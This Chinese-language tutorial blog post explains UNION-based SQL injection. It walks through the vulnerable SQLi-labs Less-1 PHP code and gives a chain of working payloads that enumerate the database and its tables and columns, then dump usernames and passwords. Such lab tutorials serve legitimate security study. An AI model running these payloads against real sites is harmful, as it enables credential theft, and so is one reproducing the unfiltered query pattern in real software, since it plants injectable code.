冲击红队第十五天 - union 联合注入

Posted 在下小黄

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了冲击红队第十五天 - union 联合注入相关的知识,希望对你有一定的参考价值。

大家好!
我是小黄,很高兴又跟大家见面啦 !
拒绝水文,从我做起 !!!!
如若转载请注明出处 ,!!!!
今天更新的是:

  • 冲击红队第十五天 - union 联合注入

创建时间:2021年10月6日

冲击红队第十五天 - union 联合注入

一、union 联合注入原理

  • 联合查询注入是联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段要数要相同,不然会出现报错。

  • union 用于合并两个或多个 SELECT 语句的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合到一起,使用谓词为UNION或UNION ALL。

  • 要注意的是UNION 内部的 SELECT 语句必须拥有相同数量的列,列也必须拥有相似的数据类型,每条 SELECT 语句中的列的顺序必须相同。

举个例子:

SELECT column_name(s) FROM table_name1 UNION SELECT column_name(s) FROM table_name2
  • 个人理解联合注入是根据一次次的试探结果,确定表、库、字段名等,最后结合sql语句中union操作符的特性,获取到你想要的数据。
  • 说到联合注入,这里提前跟大家介绍下SQL中“union”和“order by”,方便理解后文的操作步骤。

举个例子:

SELECT * FROM guestbook WHERE comment_id=1 union select 1,2,3 from users

# 这些数字可以替换成字段的名称或者函数,替换成函数

SELECT * FROM guestbook WHERE comment_id=1 union select database(),user(),version() from users

# 还可以将函数替换为字段

SELECT * FROM guestbook WHERE comment_id=1 union select user_id,user,password from users

# 如果没有加上 limit 限定条数会把所有内容查询出来,所以都会加上 limit 1 限定显示一条条目

SELECT * FROM guestbook WHERE comment_id=1 union select user_id,user,password from users limit 1

# 但是只会显示第一条,因为 SELECT * FROM guestbook WHERE comment_id=1 这个语句是存在记录的。
# 如果想要 admin 的内容可以把 1 换成其他不存在的记录,因为默认负数就表示不存在的,所以可以在数字前加上-1 即可显示第二个表的内容。

SELECT * FROM guestbook WHERE comment_id=-1 union select user_id,user,password from users limit 1

union 联合注入原理:

  • 在上面详细的介绍了原理,现在再来分析有 SQL 注入漏洞的代码,通过分析代码,更深入地了解 SQL 注入漏洞
<?php
//including the mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables 
if(isset($_GET['id']))

	// 接收前端传递过来的数据
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\\n");
fclose($fp);

// connectivity 

// 通过前端传递过来的 id 值进行拼接,使用SQL语句进行查询,此处考虑两个点, 一个是闭合前面你的 ' 另一个是处理后面的 ' , 一般采用两种思路, 闭合后面的引号或者注释掉, 注释掉采用--+ 或者 #(%23)
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
// 检索user表中 id = 传递的参数 返回一条结果

// 将 $sql 传递过来的数据进行执行
$result=mysql_query($sql);

// 将数据库结果进行展示
$row = mysql_fetch_array($result);

	if($row)
	
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	
	else 
	
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
  // mysqli_error() 函数返回最近调用函数的最后一个错误描述。
	echo "</font>";  
	

	else  echo "Please input the ID as parameter with numeric value";

?>

# SQL 注入产生原因 :

Sql 语句为$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
id 参数在拼接 sql 语句时, 未对 id 进行任何的过滤等操作, 所以当提交 'or 1=1--+, 
直接构造的 sql 语句就是SELECT * FROM users WHERE id='1'or 1=1--+ LIMIT 0,1
这条语句因 or 1=1 所以为永恒真。

union 联合注入原理:

拿 SQLi - labs 1 题目做个演示:

# 出现报错信息,根据报错信息,可以确定输入参数的内容被存放到一对单引号中间:
?id=1'
根据上面代码审计的结果,咱们输入的1在数据库中出现的位置为:select ... from ... where id='1' ......

# 首先要用order by 子句猜解查询的字段数(二分法)。 [猜解查询字段数的原因:使用联合查询时,副查询字段数需要与主查询字段数一致,否则会报错。]

?id=1'order by 3 --+ 成功
?id=1'order by 4 --+ 失败

  则说明有3个字段



# 通过联合查询(union)构造payload来获取数据库名 :
?id=-1'union select 1,2,3 --+

?id=-1'union select 1,2,database() --+
?id=-1'union select 1,database(),3 --+
?id=-1'union select database(),2,3 --+
  
---> "SELECT * FROM users WHERE id='-1'union select 1,2,database() LIMIT 0,1"
  
# 注:
     为什么是-1呢?因为前面查询为假后面才能正常查询.
     利用报错注入,union是联合查询,意思是俩个select查询结果合并,我们把左边的设置为空集那么右边的select查询自然成了第一行,这就是union select。




# 构造payload 来获取数据表
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

# 注:
		 group_concat( [DISTINCT] 要连接的字段 [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] ) 将相同的行组合起来
		 group_concat(table_name) 
     information_schema:结构用来存储数据库系统信息 
	   information_schema.tables
     SCHEMA_NAME(schema_name) 表示数据库名称
     TABLE_SCHEMA(table_schema) 表示表所属的数据库名称; 
     TABLE_NAME(table_name) 表示所属的表的名称 
     COLUMN_NAME(column_name) 表示字段名


# 构造 payload 来获取字段名:
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+


# 构造 payload 来获取用户名账号和密码:
?id=-1' union select 1,2,group_concat(username,0x3a,password) from users--+

# 注:
	0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ':' ,用以分割pasword和username。

___
各位路过的朋友,如果觉得可以学到些什么的话,点个赞 再走吧,欢迎各位路过的大佬评论,指正错误,也欢迎有问题的小伙伴评论留言,私信。

每个小伙伴的关注都是本人更新博客的动力!!!
请微信搜索【 在下小黄 】文章更新将在第一时间阅读 !

博客中若有不恰当的地方,请您一定要告诉我。前路崎岖,望我们可以互相帮助,并肩前行!

以上是关于冲击红队第十五天 - union 联合注入的主要内容,如果未能解决你的问题,请参考以下文章

冲击红队第十四天 - SQL 注入漏洞

冲击红队第十四天 - SQL 注入漏洞

SQL注入系列篇之union联合注入

Mysql注入 -- 联合注入

SQL注入之union联合注入

sql注入:union联合查询